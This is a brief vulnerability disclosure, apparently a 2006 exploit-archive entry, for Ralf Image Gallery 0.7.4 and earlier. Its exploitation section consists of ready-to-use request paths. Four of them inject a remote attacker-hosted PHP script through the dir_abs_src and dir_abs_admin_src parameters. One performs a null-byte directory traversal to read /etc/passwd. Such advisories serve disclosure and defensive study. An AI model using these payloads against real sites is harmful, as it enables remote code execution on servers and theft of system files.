22 lines
No EOL
936 B
Text
22 lines
No EOL
936 B
Text
Title: Ralf Image Gallery <= 0.7.4 - Multiple Remote File Include and directory
|
|
traversal Vulnerabilities
|
|
-----------------------------------------------------------------
|
|
Vendor: RIG is developed and maintained by Le R'alf
|
|
URL: http://rig.powerpulsar.com/
|
|
-----------------------------------------------------------------
|
|
|
|
Credits:
|
|
Discovered by: 'Aesthetico'
|
|
http://www.majorsecurity.de
|
|
-----------------------------------------------------------------
|
|
|
|
Exploitation:
|
|
-----------------------------------------------------------------
|
|
|
|
/check_entry.php?dir_abs_src=http://www.yourspace.com/yourscript.php?
|
|
/check_entry.php?dir_abs_src=../../../../../../../../../etc/passwd%00
|
|
/admin_album.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
|
|
/admin_image.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
|
|
/admin_translate.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
|
|
|
|
# milw0rm.com [2006-06-22] |